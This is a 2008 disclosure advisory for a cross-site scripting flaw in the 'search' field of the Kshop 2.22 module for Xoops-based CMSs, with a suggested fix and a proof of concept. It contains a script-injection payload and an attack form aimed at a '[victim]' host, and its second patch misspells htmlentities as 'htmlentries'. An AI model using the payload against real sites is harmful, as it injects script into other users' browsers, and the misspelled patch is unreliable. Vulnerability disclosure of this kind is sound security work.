##########################################
Kshop module search variable&field remote XSS
Vendor url:http://www.kaotik.biz/
Advisore:http://lostmon.blogspot.com/2008/08/
kshop-module-search-variable-and-field.html
Vendor notify:no exploit available:YES
##########################################


Kshop is a E-commerce php/Mysql script module for
multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Kshop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the
application does not validate 'Search' variable and
search form field include in this module upon
submission to 'kshop_search.php' script in Kshop module.
This could allow a user to create a specially crafted form
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss of integrity.


#################
Versions
################·

Kshop module 2.22

i make a test with ImpressCMS
and this CMS in kshop module
have version 2.23 ????


itīs posible that prior versions
are affected too.

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

###################
Solution
###################

At this moment ,no have solution...

but you can make a simple patch ,open kshop_search.php
inside kshop module folder arround line 45 you have
[code]

$xoopsTpl->assign('searchTerm',$_POST['search']);

you can use strip_tags() PHP function , like:

$xoopsTpl->assign('searchTerm',strip_tags($_POST['search']));

now itīs patched , because this remove all tags in the search variable.

or you can use htmlentities() PHP function for patch much more clean like :

$xoopsTpl->assign('searchTerm',htmlentries($_POST['search']));
[/code]



###################
Proof of Concept.
###################

This Issue could not exploit directly by URL
because the form field have a limitation of 20 chars
and we need a POST to exploit ,for that we canīt exploit
directly by url because it is a GET and we need a POST.

This is not a problem, we can make a form with the POST
and without any restriction in the form field for Exploit it

put some javascript or html code in the form field



Example: "><script>alert()</script>

its necesary that you put "> before the code.



<form action="http://[victim]/modules/kshop/kshop_search.php" method="POST">

<input type="text" name="search" value="Put your XSS Here !!!">

<input type="image"
src="http://www.spymac.com/upload/2007/01/18/OQxsPeTzFN.gif"></form>




############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....